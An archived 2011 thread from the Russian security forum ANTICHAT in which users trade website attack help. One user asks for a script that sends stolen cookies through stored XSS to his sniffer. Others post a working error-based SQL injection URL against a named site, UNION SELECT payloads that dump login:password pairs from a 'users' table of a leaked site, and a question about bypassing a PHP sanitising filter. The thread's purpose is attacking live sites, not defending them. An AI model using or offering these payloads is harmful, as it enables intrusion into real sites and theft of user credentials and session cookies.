ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
10.02.2011, 00:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
225312
Репутация:
-6
|
|
как сюда вствить ссылку на мой снифер
|
|
|
|
10.02.2011, 00:47
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
насчёт той скули, которая была в корне раздела ( http://chatium.com/user/profile?id=\' )
http://chatium.com/user/profile?id=1\') and (select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) -- 1
|
|
|
10.02.2011, 14:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
225312
Репутация:
-6
|
|
активная xss
помогите составить правельный скрипт чтобы куки передались.....
|
|
|
|
10.02.2011, 16:04
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
http://forum.antichat.net/thread44125.html в статье расписано всё как нельзя лучше
|
|
|
|
10.02.2011, 17:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
225312
Репутация:
-6
|
|
........
|
|
|
|
10.02.2011, 19:06
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
я бы сделал например такой сниффер, чтобы он возвращал картинку:
По памяти пишу, могут быть какие-то мелкие ошибки, но идея думаю ясна |
|
|
|
10.02.2011, 20:49
|
|
Участник форума
Регистрация: 15.01.2009
Сообщений: 158
Провел на форуме:
469704
Репутация:
26
|
|
Подскажите со скулёй.
Ковырялся на денвере в скриптах одного слитого сайта, на локалке все прекрасно работает, а в сети не хочет.
На денвере провожу запросы вида:
Код:
Code:
' UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7 FROM users/*
' UNION SELECT 1,concat(login,0x3a,password),3,4,5 FROM users LIMIT 1,1/*
//Количество столбцов разное т.к. делаю через разные скрипты.
А на серваке не хочет ничего делать:
И так
Код:
Code:
' UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7 FROM users/*
' UNION SELECT 1,concat(login,0x3a,password),3,4,5 FROM users LIMIT 1,1/*
и вот так
Код:
Code:
' UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7 FROM users --
' UNION SELECT 1,concat(login,0x3a,password),3,4,5 FROM users LIMIT 1,1 --
В ответ получаю:
Сообщение от None
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '--' limit 1' at line 1
Сообщение от None
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/*' limit 1' at line 1
Что ещё можно попробовать? |
|
|
|
10.02.2011, 21:36
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
попробуй выложить скрипт
|
|
|
|
10.02.2011, 22:24
|
|
Участник форума
Регистрация: 15.01.2009
Сообщений: 158
Провел на форуме:
469704
Репутация:
26
|
|
Сообщение от None
попробуй выложить скрипт
GPRS, замучаюсь. Только разобрался путём тыка:
После коммента -- поставил + и всё заработало =))
|
|
|
|
11.02.2011, 23:43
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]filter_var[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]FILTER_SANITIZE_STRING[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
Долее переменная $text вставляется в запрос ".... WHERE text='".$text."' ...."
Возможно ли обойти данный фильтр? |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
